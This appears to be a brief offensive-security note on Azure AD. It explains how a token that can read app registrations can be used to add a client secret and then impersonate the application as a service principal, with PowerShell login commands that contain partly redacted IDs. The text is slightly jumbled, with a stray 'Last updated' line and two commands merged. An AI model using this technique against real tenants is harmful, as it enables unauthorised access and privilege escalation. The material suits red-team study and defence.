If you have a access_token that is able to Get-AzADApplication:
It is possible to check if that access_token can set a secret on that app using a script: https://github.com/lutzenfried/OffensiveCloud/blob/main/Azure/Tools/Add-AzADAppSecret.ps1.
Now, using these secret we can impersonate that application:
Last updated
Connect-AzAccount -AccessToken $token -MicrosoftGraphAccessToken $graphtoken -AccountId 62e44426-5c46-4e3c-8a89-xxxxxx$password = ConvertTo-SecureString 'client secret' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('f072c4a6-b440-40de-xxxxxxx', $password)
Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant 2d50cb29-5f7b-48a4-87ce-xxxxxxxx